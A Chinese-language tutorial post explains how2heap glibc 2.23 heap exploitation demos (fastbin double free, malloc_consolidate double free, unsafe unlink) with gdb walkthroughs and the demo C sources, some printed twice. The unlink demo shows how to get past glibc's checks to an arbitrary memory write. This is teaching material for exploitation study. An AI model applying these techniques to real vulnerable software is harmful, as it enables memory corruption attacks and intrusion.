深入理解how2heap_2.23(1)
源码
使用ubuntu:16.04编译, 然后使用pwncli修改运行环境。 malloc三次相同大小的堆块后,在0x400700下断点。 观察堆结构。 依次释放堆块a,b后,在0x4007CF下断点。 观察fastbin结构。 再次释放a,形成double free后,在0x4007F8下断点。 观察fastbin结构,已经形成ABA结构。 此时依次申请a,b,c三个相应大小的堆块,将会依次摘出a,b,a, fastbin中a->b->a->b...这条链子会一直存在,不断从头部取出相应大小的堆块。 申请a后,在0x400835下断点(rax保存了_malloc函数的返回值)。 此时fastbin结构,形成了BAB结构。 同样,申请完b后在0x400843下断点。 此时fastbin结构,又形成了ABA结构。 同样申请完c后在0x400851下断点。 此时fastbin结构,再次形成BAB结构。 此时a和c指向同一地址。
源码
calloc p1堆块后,在0x4006C5处下断点。 查看堆结构, 可以看到多出来一块0x411大小的堆块。 这个堆块是puts的缓冲区。puts函数用于将字符串输出到标准输出流(stdout),而标准输出流是一个文件流,需要在内存中分配一块缓冲区来存储输出的字符串,下图是其分配过程。 free(p1)后,p1会优先进入fastbins。 再次申请0x400(实际大小为0x410)的chunk。 在gdb里s步入调试,可以看到触发了malloc_consolidate机制。原因如下,因为libc再分配large chunk时,fastbin中有p1这个chunk存在,所以会调用malloc_consolidate()函数整合fastbins中的chunk,并放入unsorted bin或top_chunk;然后unsorted bin中的chunk又会被取出放入各自对应的bins。(这个bins为small bin和large bin。这也是chunk唯一进入small bin和large bin的机会)。 malloc_consolidate()函数执行完以后,因为p1与top_chunk相邻,所以p1被合并到了top_chunk。top_chunk的基址也变成了p1的prev_size的地址。 然后malloc函数会从top_chunk获取chunk,那么p1的地址就已经和p3指向同一块地址了。 此时再次free(p1),在0x40076c处下断点。 由于p1和p3指向同一个大小为0x411的chunk,而这个chunk又和top_chunk相邻,所以会再次被合并到top_chunk。 如果这个时候,我们再次申请一个chunk,在0x40077A处下断点。 那么这个chunk的地址还会与p1 && p3的地址一样。 至此p1,p3,p4指向了同一块chunk。
源码
当然,其实chunk0_ptr并不一定是一个全局指针。以下代码在glibc2.23依然起作用。
简单介绍一下unlink,CTF Wiki 里有介绍,简单总结如下:
首先申请两块smallbin_chunk。 为了绕过unlink检查,这里将全局的chunk0_ptr+0x10(chunk0_ptr[2])处的内容改为chunk0_ptr-0x18的地址,注意这里chunk0_ptr[2]指向的是全局变量的地址。 同样,接下来将chunk0_ptr[3]的内容改为chunk0_ptr-0x10的地址。 chunk0_ptr位置在bss节。
此时chunk0的堆结构。可以看到chunk0_ptr指向chunk0_fd(0x603010)的位置。chunk0_fd_nextsize和chunk0_bk_nextsize已被修改为全局变量(bss节)处的地址。 用图来表示如下
接下来cdqe指令将EAX寄存器中的DWORD(32 位值)符号扩展为RAX寄存器中的 QWORD(64 位值)。然后利用shl指令逻辑左移三位,再利用neg指令求补。最后也就是将chunk1_hdr的内容改为chunk1_ptr-2(chunk1_prev_size)的地址。
接下来将chunk1_hdr[0]改为0x80大小,也就是chunk1的prev_size位变为0x80。
然后利用and指令(与运算有零则零)把chunk1_hdr+1也就是chunk1_size的PREV_INUSE位改为0。
现在堆结构如图。因为chunk_prev_size=0x80,所以P_chunk如下
然后把chunk1给free()掉因为其PREV_INUSE为0,又是small bin大小,触发unlink,要将P这个fake chunk摘除。 那么此时FD=P->FD和BK=P->bk,FD->bk == P, BK->fd == P。可以能够看到成功绕过glibc2.23检查。注意,我画的时候是根据布局画的,堆由低向高地址增长(由高向低画),bss由低向高画的。
接下来执行 两步操作 FD->bk=BK, BK->fd=FD。FD和BK只相差0x8字节大小。第一步会把chunk0_ptr指向低0x10字节处(0x602068),第二步把chunk0_ptr指向低0x18字节处(0x602060),最终chunk0_ptr指向了0x602060处。chunk0_ptr = 0x602060,我们向chunk0_ptr写入内容时就会从0x602060开始向高地址写,我们发现,写到高0x18时,写到了我们保存写入地址指针的地址,这个地址(chunk0_ptr的物理地址0x602078)存储的地址(0x602060)就是我们开始写的地址,也就是chunk0_ptr指向的地址。 可以看到,chunk0_ptr
指向的地址由*chunk0_ptr-0x18
保存,修改*chunk0_ptr-0x18
存储的地址(0x602060),也就修改了写入的起始地址,也就是chunk0_ptr指向的地址,我们会从这个新地址重新开始写,也就达到了任意地址写的效果。这只是其中一种用法,建议看例题来加深理解。 我们也可以通过从0x602060开始向高地址覆盖,覆盖到0x602078处时,修改这里保存的地址,然后下次写时就会从修改的这个新地址开始写入。
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int
main()
{
fprintf
(stderr,
"This file demonstrates a simple double-free attack with fastbins.\n"
);
fprintf
(stderr,
"Allocating 3 buffers.\n"
);
int
*a =
malloc
(8);
int
*b =
malloc
(8);
int
*c =
malloc
(8);
fprintf
(stderr,
"1st malloc(8): %p\n"
, a);
fprintf
(stderr,
"2nd malloc(8): %p\n"
, b);
fprintf
(stderr,
"3rd malloc(8): %p\n"
, c);
fprintf
(stderr,
"Freeing the first one...\n"
);
free
(a);
fprintf
(stderr,
"If we free %p again, things will crash because %p is at the top of the free list.\n"
, a, a);
fprintf
(stderr,
"So, instead, we'll free %p.\n"
, b);
free
(b);
fprintf
(stderr,
"Now, we can free %p again, since it's not the head of the free list.\n"
, a);
free
(a);
fprintf
(stderr,
"Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n"
, a, b, a, a);
a =
malloc
(8);
b =
malloc
(8);
c =
malloc
(8);
fprintf
(stderr,
"1st malloc(8): %p\n"
, a);
fprintf
(stderr,
"2nd malloc(8): %p\n"
, b);
fprintf
(stderr,
"3rd malloc(8): %p\n"
, c);
assert
(a == c);
}
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int
main()
{
fprintf
(stderr,
"This file demonstrates a simple double-free attack with fastbins.\n"
);
fprintf
(stderr,
"Allocating 3 buffers.\n"
);
int
*a =
malloc
(8);
int
*b =
malloc
(8);
int
*c =
malloc
(8);
fprintf
(stderr,
"1st malloc(8): %p\n"
, a);
fprintf
(stderr,
"2nd malloc(8): %p\n"
, b);
fprintf
(stderr,
"3rd malloc(8): %p\n"
, c);
fprintf
(stderr,
"Freeing the first one...\n"
);
free
(a);
fprintf
(stderr,
"If we free %p again, things will crash because %p is at the top of the free list.\n"
, a, a);
fprintf
(stderr,
"So, instead, we'll free %p.\n"
, b);
free
(b);
fprintf
(stderr,
"Now, we can free %p again, since it's not the head of the free list.\n"
, a);
free
(a);
fprintf
(stderr,
"Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n"
, a, b, a, a);
a =
malloc
(8);
b =
malloc
(8);
c =
malloc
(8);
fprintf
(stderr,
"1st malloc(8): %p\n"
, a);
fprintf
(stderr,
"2nd malloc(8): %p\n"
, b);
fprintf
(stderr,
"3rd malloc(8): %p\n"
, c);
assert
(a == c);
}
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
void
main() {
puts
(
"This is a powerful technique that bypasses the double free check in tcachebin."
);
printf
(
"Fill up the tcache list to force the fastbin usage...\n"
);
void
* p1 =
calloc
(1,0x40);
printf
(
"Allocate another chunk of the same size p1=%p \n"
, p1);
printf
(
"Freeing p1 will add this chunk to the fastbin list...\n\n"
);
free
(p1);
void
* p3 =
malloc
(0x400);
printf
(
"Allocating a tcache-sized chunk (p3=%p)\n"
, p3);
printf
(
"will trigger the malloc_consolidate and merge\n"
);
printf
(
"the fastbin chunks into the top chunk, thus\n"
);
printf
(
"p1 and p3 are now pointing to the same chunk !\n\n"
);
assert
(p1 == p3);
printf
(
"Triggering the double free vulnerability!\n\n"
);
free
(p1);
void
*p4 =
malloc
(0x400);
assert
(p4 == p3);
printf
(
"The double free added the chunk referenced by p1 \n"
);
printf
(
"to the tcache thus the next similar-size malloc will\n"
);
printf
(
"point to p3: p3=%p, p4=%p\n\n"
,p3, p4);
}
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
void
main() {
puts
(
"This is a powerful technique that bypasses the double free check in tcachebin."
);
printf
(
"Fill up the tcache list to force the fastbin usage...\n"
);
void
* p1 =
calloc
(1,0x40);
printf
(
"Allocate another chunk of the same size p1=%p \n"
, p1);
printf
(
"Freeing p1 will add this chunk to the fastbin list...\n\n"
);
free
(p1);
void
* p3 =
malloc
(0x400);
printf
(
"Allocating a tcache-sized chunk (p3=%p)\n"
, p3);
printf
(
"will trigger the malloc_consolidate and merge\n"
);
printf
(
"the fastbin chunks into the top chunk, thus\n"
);
printf
(
"p1 and p3 are now pointing to the same chunk !\n\n"
);
assert
(p1 == p3);
printf
(
"Triggering the double free vulnerability!\n\n"
);
free
(p1);
void
*p4 =
malloc
(0x400);
assert
(p4 == p3);
printf
(
"The double free added the chunk referenced by p1 \n"
);
printf
(
"to the tcache thus the next similar-size malloc will\n"
);
printf
(
"point to p3: p3=%p, p4=%p\n\n"
,p3, p4);
}
使用ubuntu:
16.04
编译并使用pwncli改写rpath。
使用ubuntu:
16.04
编译并使用pwncli改写rpath。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
uint64_t *chunk0_ptr;
int
main()
{
setbuf
(stdout, NULL);
printf
(
"Welcome to unsafe unlink 2.0!\n"
);
printf
(
"Tested in Ubuntu 14.04/16.04 64bit.\n"
);
printf
(
"This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n"
);
printf
(
"The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n"
);
int
malloc_size = 0x80;
int
header_size = 2;
printf
(
"The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n"
);
chunk0_ptr = (uint64_t*)
malloc
(malloc_size);
uint64_t *chunk1_ptr = (uint64_t*)
malloc
(malloc_size);
printf
(
"The global chunk0_ptr is at %p, pointing to %p\n"
, &chunk0_ptr, chunk0_ptr);
printf
(
"The victim chunk we are going to corrupt is at %p\n\n"
, chunk1_ptr);
printf
(
"We create a fake chunk inside chunk0.\n"
);
printf
(
"We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n"
);
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(
sizeof
(uint64_t)*3);
printf
(
"We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n"
);
printf
(
"With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n"
);
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(
sizeof
(uint64_t)*2);
printf
(
"Fake chunk fd: %p\n"
,(
void
*) chunk0_ptr[2]);
printf
(
"Fake chunk bk: %p\n\n"
,(
void
*) chunk0_ptr[3]);
printf
(
"We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n"
);
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
printf
(
"We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n"
);
printf
(
"It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n"
);
chunk1_hdr[0] = malloc_size;
printf
(
"If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n"
,(
void
*)chunk1_hdr[0]);
printf
(
"We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n"
);
chunk1_hdr[1] &= ~1;
printf
(
"Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n"
);
printf
(
"You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n"
);
free
(chunk1_ptr);
printf
(
"At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n"
);
char
victim_string[8];
strcpy
(victim_string,
"Hello!~"
);
chunk0_ptr[3] = (uint64_t) victim_string;
printf
(
"chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n"
);
printf
(
"Original value: %s\n"
,victim_string);
chunk0_ptr[0] = 0x4141414142424242LL;
printf
(
"New Value: %s\n"
,victim_string);
assert
(*(
long
*)victim_string == 0x4141414142424242L);
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2023-9-14 11:33
被jelasin编辑
,原因: